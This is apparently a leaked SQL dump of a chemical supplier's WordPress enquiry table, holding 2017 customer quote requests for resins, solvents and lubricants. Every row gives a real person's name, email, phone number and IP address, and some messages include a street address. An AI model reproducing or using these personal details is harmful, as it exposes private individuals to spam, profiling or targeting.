INSERT INTO `wp_enquiry_detail_new` VALUES (1010, 'Marc Perreault', 'marc.perreault@fabrithane.com', 'Hello,\nWe are interested in using your products in our facility. We would like to test out 1 case if the pricing is good. Thank you and we look forward to hearing back from you.', '1705-563-2223', 'P&amp;D for Urethane Conformal Coating #MS-470C', '162.251.198.136', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"735";s:5:"title";s:7:"MS-470C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-470C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-01 12:49:06', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1011, 'victor hernandez', 'victor_g_hernandez@dell.com', 'Requesting quote for MS-555 &amp; BS-557 Heavy Duty Flux Remover product.', '512736-6817', 'Quote', '143.166.255.126', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1384";s:5:"title";s:10:"MS-555/557";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-01 12:51:36', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1012, 'Marc Perreault', 'marc.perreault@fabrithane.com', 'Hello again.\n\nWe are also interested in getting pricing for your mold release agent #MS-122AV. \nIf price is good we would order 1 case to test.\n\nThank you.', '1705-563-2223', 'P&amp;D for you Release Agent #MS-122AV', '162.251.198.136', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"182";s:5:"title";s:8:"MS-122AV";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Automotive.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-01 13:11:06', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1013, 'Amy Johnson', 'accounting@rochesterchemical.com', 'Hi Sales,\nPlease send us your pricing for the GPL-226   7KG pail.\nThanks!', '603668-6686', 'GPL-226   7KG pail', '23.27.244.235', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"850";s:5:"title";s:7:"GPL 226";s:5:"price";s:0:"";s:5:"quant";s:1:"7";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_92739160.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-01 13:12:14', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1014, 'Kathleen Long Devol', 'kathleen.l.devol@nasa.gov', 'Could I please get a quote for the purchase of 1 gal of Epikure 3223 and a current SDS for this Curing Agent.    Thanks Kathy.', '757864-1125', 'Quote for 1 gal of Epikure 3223', '146.165.128.130', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1183";s:5:"title";s:15:"EPIKURE™ 3223";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3223.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-01 13:40:11', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1015, 'Adrian Balan', 'adrian@tficompany.com', 'Could you send us a quote for MS-462H for 1Gal, 5Gal and 55Gal? Do you have a distributor in Ontario, Canada?\n\nThank you.', '416615-0214', 'quote', '65.94.57.28', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"732";s:5:"title";s:7:"MS-462H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-462H.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-01 15:09:32', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1016, 'Xavier Brulotte', 'xavierbrulotte@fibatech.com', 'Hello, \n\nWould it be possible to have a quote for the  EPON 828 resin from Hexion? We would be interested on price and lead times on 1 gal. and 5 gal. sizes. \n\nThank you, \n\nXavier\n\nXavier Gagne-Brulotte\nAdvanced Manufacturing Engineer\nComposites Division\nFIBA Technologies, Inc.\n53 Ayer Road\nLittleton, MA. 01460\n\nPhone: 508.887.7195\nemail: xavierbrulotte@fibatech.com \n', '508887-7195', 'RFQ - Epon 828 ', '98.118.126.210', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-01 16:01:20', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1017, 'Nate Skolnik', 'ns3@illinois.edu', 'I was hoping to purchase 1 pint of the EPON 8132, and the associated curing agent. What would be the cost of this amount? Thanks', '703554-3795', 'Price Quote', '198.123.56.221', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"912";s:5:"title";s:12:"EPON™ 8132";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-8132.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-01 17:48:27', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1018, 'Bogdan Dryzhakov', 'bogdan.dryzhakov@xerionbattery.com', 'I am looking for about 100g of this product. Could you please tell me the price, purity, and attach a spec sheet of the material?', '', '', '130.126.152.215', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"960";s:5:"title";s:7:"157 FSL";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-01 18:27:11', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1019, 'Nate Skolnik', 'ns3@illinois.edu', 'I was hoping to find the price of quart sized container. Additionally, is the quart the smallest amount that be supplied? ', '', 'Price Quote', '198.123.56.221', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1166";s:5:"title";s:15:"EPIKURE™ 3046";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIKURE-2.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-01 19:53:04', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1020, 'Nate Skolnik', 'ns3@illinois.edu', 'What is the recommended curing agent for this resin? Thanks,\n-Nate', '', 'Recommended curing agent', '198.123.56.221', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"912";s:5:"title";s:12:"EPON™ 8132";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:74:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-8132.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-01 20:13:37', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1021, 'Vladimir Gusiatnikov', 'vgusiatnikov@alveotechnologies.com', 'Hi, we would like to order 3 16 oz. aerosol cans of Vertrel XF. Application is R&amp;D use for cleaning bare circuit boards. I worked with you at Stanford Research Systems and Wave 80 Biosciences. Thanks!', '+1971-998-0321', '', '216.75.232.218', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1278";s:5:"title";s:10:"Vertrel XF";s:5:"price";s:0:"";s:5:"quant";s:1:"3";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-xf.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-01 20:28:59', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1022, 'Rutger Blankley', 'rutger.blankley@enersys.com', 'Hello,\n\nI am looking for pricing and lead time for 1 gallon and 5 gallons of Epon 828.\n\nRegards,\n\nRutger', '727520-1393', 'Epon 828', '208.87.238.201', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-01 21:18:54', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1023, 'Yu-Shen Lin', 'yslin@ferrotec.com', 'Hi,\nI am writing to ask the price of KS 1220.\n\nThanks,\nYu-Shen\n', '612607-2677', 'Price Inquiry', '73.61.22.169', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2460";s:5:"title";s:7:"KS 1220";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_84131626.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-02 03:24:22', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1024, 'Joseph thornock', 'thornockjoe84@gmail.com', 'How much would it be for a pallet of this', '307677-1404', 'Price', '199.192.124.205', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1035";s:5:"title";s:21:"EPI-REZ™ 5522-WY-55";s:5:"price";s:0:"";s:5:"quant";s:1:"5";s:3:"img";s:82:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIREZ-5522-WY-55.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-02 06:21:43', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1025, 'Jeff Hwang', 'marinastarco@yahoo.com', 'Hi Sales, \n\nWould you please quote me the following item. Your return quotation will be very much appreciated. \n\nProduct Name: EPIKURE 3234 Curing Agents \nPackage: 1 gal / can \n Quantity: 2 cans\n\nBest Regards \n\nJeff Hwang \nMarina Star Co \n15200 Shining Star Lane \nSan Leandro  CA 94579 \nE-mail: marinastarco@yahoo.com', '510962-0576', 'Quotation Inquiry:EPIKURE 3234 Curing Agents ', '107.194.156.215', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1185";s:5:"title";s:15:"EPIKURE™ 3234";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3234.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-02 06:27:49', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1026, 'Qing Jie', 'taixuan@gmail.com', 'Could you please let me know the price for ms-782 dupont vertrel xf cleaning agent.', '713743-4949', 'ms-782 dupont vertrel xf cleaning agent', '129.7.0.148', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1278";s:5:"title";s:10:"Vertrel XF";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-xf.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-02 18:55:07', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1027, 'Alex', 'alcon909@aol.com', '1 Gal. \nManufacturers Certification Required', '909598-2323', 'RFQ', '172.58.24.168', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-02 19:55:00', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1028, 'Seongyul Lim', 'youl@omics.co.kr', 'My name is Bill Lim of Omics Biotech as a vendor in Korea.\nOur customer want to buy your product; Epon828 so i wonder if you can supply this product to us and how much is minimum size for phasing (our customer want a quart of Epon 828)\nLooking forward to your reply and have a nice day!', '+822-2245-5660', 'Inquire the price of  your product (Epon828)', '61.32.67.75', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-05 08:37:58', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1029, 'Brent Shelby', 'brent@micro-fabllc.com', 'I need a quote for this dry lubricant. What different sizes does this stuff come in. Also, do you guys carry MS-782? We will need that as well for the project we are quoting.\n\nThanks,', '763447-6862', 'Quote', '98.142.27.90', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"306";s:5:"title";s:38:"MS-143XD | Dry Film Mold Release Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143XD.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-05 15:44:31', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1030, 'Karen Krawczyk', 'kkrawczyk@msitransducers.com', 'please send pricing information.\n\nhow many cans per case of MS-122AD?', '978486-0404', 'PTFE Release agent MS-122AD', '50.247.231.17', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:38:"MS-122AD | Dry Film PTFE release agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-05 16:21:07', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1031, 'Whitney', 'Whitney.Mciver@gkndriveline.com', 'Hello,\n\nI am looking for a cleaning solvent for automotive parts (steel) in which I can use to wash the part for filtration / vacuum pump. Do any of your products have the ability to be used as a wash to clean metal and grease?', '919356-7155', 'Inquiry', '208.87.237.201', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1344";s:5:"title";s:7:"Suprion";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:79:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/opteon-suprion.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-05 20:27:24', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1032, 'Ernest Werbel', 'ernest@werbelmicrowave.com', 'Been using 557.  Also considering MS-560 &amp; MS-562 Flux Cleaner.  557 is working well but I want to see if you have something that is comparable but less potentially harmful (exposure) and possibly lower cost.', '973515-3001', 'Flux removers', '173.70.156.13', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1697";s:5:"title";s:24:"MS-725/727 Flux Removers";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:103:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/miller-stephenson-flux-remover-solvent.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-05 22:04:49', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1033, 'Eric Ayotte', 'e_ayotte@hkrevit.com', 'I am planning my electrolyzer build for next week and i am short  4 kg of grease. Do you have it and how fast can I get it?', '860712-0986', 'electrolyzer build', '50.245.32.5', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"789";s:5:"title";s:7:"GPL 205";s:5:"price";s:0:"";s:5:"quant";s:1:"4";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_329225291.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-06 10:28:43', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1034, 'Lindsey Maglione', 'lindsey.maglione@emfinc.net', 'Can I please get pricing for part # C795968-1, Krytox LVP grease, the 8 oz tube, qty 1 (unless there is a minimum buy) ', '321338-4134', 'Krytox LVP grease', '71.43.32.154', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"862";s:5:"title";s:3:"LVP";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:86:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_22381852.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-06 14:09:13', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1035, 'Jesse Newberry', 'jnewberry@triumphgroup.com', 'I would like a quote for a case of 12 aerosol cans of this mold release.\nthank you,', '509623-8205', 'boron nitride extra high temp Release', '65.216.171.130', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"308";s:5:"title";s:39:"MS-153 | High Temperature Release Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Boron-nitride.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-06 14:27:20', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1036, 'Daniel Shults', 'Daniel@Utechtt.com', 'Hi, \nI need a quote for Vertrel XF.  We don\'t need a large quantity. Price plus shipping and the size containers you have available ?\n Daniel', '316201-6699', 'Vertrel  XF', '174.71.131.132', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1278";s:5:"title";s:10:"Vertrel XF";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-xf.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-06 16:03:37', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1037, 'Marlene Stump', 'mstump@swe.com', 'Please advise price of 1 bottle of MS-111.  If possible we would like to receive as a sample for testing.', '281240-4000', 'MS-111', '50.194.171.78', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-06 18:02:05', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1038, 'James Russell', 'James.E.Russell5@boeing.com', 'Can you please give me an engineering estimate for relative cost of ordering quantities of this MS-111 product. I am an engineer and can not negotiate quotes on behalf of Boeing, but I am looking for relative cost level considering different ordering options so an engineering estimate is sufficient.', '', 'MS-111 Engineering Estimate', '130.76.96.154', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-07 12:25:26', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1039, 'John Wayt', 'jwayt@chemdaq.com', 'I would like to obtain a sample or purchase a low quantity of the MS485G for use in our sensor application. If this meets our testing requirements it will be written into our manufacturing specification.', '412788-0202', 'EMI coatings', '72.95.131.87', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1722";s:5:"title";s:55:"RFI / EMI Nickel Conductive Coating (MS-485G / MS-487G)";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/shutterstock_484572385.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-07 14:39:19', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1040, 'LINDA MATHIS', 'lm@cmearma.com', 'Please quote price and lead-time  for 55 gals.  This is for  US Gov\'t FMS sales. We are authorized to receive GSA pricing, if available. \nPlease include the MSDS with your quote.\nReference our file # TS0619-7 in your response.\nThank you.', '305633-1524', '828 RESIN', '75.144.101.97', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-07 19:47:59', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1041, 'Stephanie Malone', 'stephanie.malone@roche.com', 'Hello, we need a more biocompatible lubricant for our DNA sequencing system.  We need a lubricant that will not negatively impact our biology.  Does your company send samples?\n\nBest,\n\nStephanie M. Malone, PhD', '669246-3041', 'Sample for evaluation in our system', '72.34.128.251', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"468";s:5:"title";s:44:"TriboSys™ Fluorinated Synthetic Lubricants";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:67:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Mi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-07 20:59:15', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1042, 'Stephanie Malone', 'stephanie.malone@roche.com', 'We need to be sure to remove mold release agents and other contaminants.  Does your company do samples?\n\nBest,\n\nStephanie M. Malone, PhD', '669246-3041', 'Sample', '72.34.128.251', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1712";s:5:"title";s:31:"Surface PrepClean™ MS-255/257";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-255.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-07 21:00:27', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1043, 'Alex  Ramirez', 'alcon909@aol.com', 'RFQ- 1 gallon\nMCR, 1 gal.)EPON 58034\n\nThank you,\nAL-Con', '909598-2323', 'RFQ', '172.58.16.179', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"994";s:5:"title";s:13:"EPON™ 58034";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPIN-58034.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-07 21:21:01', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1044, 'Everette Spore', 'ev.spore@angeloandnewton.com', 'Hi!\nCould you please quote various size quantities of GPL 205 grease up to 5 gallon pail?\n\nThanks,\nEverette', '702384-1900', 'GPL 205 Krytox grease', '71.2.214.26', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"789";s:5:"title";s:7:"GPL 205";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_329225291.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-07 21:24:14', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1045, 'MARK ANTHONY', 'Marka@reutech.com', 'Please can you advise local representative we can contact to buy in South Africa\nMS-472C URETHANE CONFORMAL COATING', '+27741251723', 'MS-472C URETHANE CONFORMAL COATING', '41.170.3.66', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"736";s:5:"title";s:7:"MS-472C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-472C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-08 12:36:39', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1046, 'Vahid Hejazi', 'valen.hejazi@gmail.com', 'price quote for epikure 3234, small quantity?', '414243-5392', '', '167.106.255.101', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1185";s:5:"title";s:15:"EPIKURE™ 3234";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3234.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-08 13:14:01', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1047, 'Tony Pisani', 'tonypisaniinc@sbcglobal.net', 'Kindly advise price and delivery of Quantity of 4 MS-907\nThank you,\nTonyP', '916390-6335', 'Kindly advise price and delivery time?', '67.174.37.55', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1149";s:5:"title";s:30:"MS-907 Two-Part Epoxy Adhesive";s:5:"price";s:0:"";s:5:"quant";s:1:"4";s:3:"img";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-907.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-08 13:22:11', '', NULL, '', '', '', NULL, '', ''); 
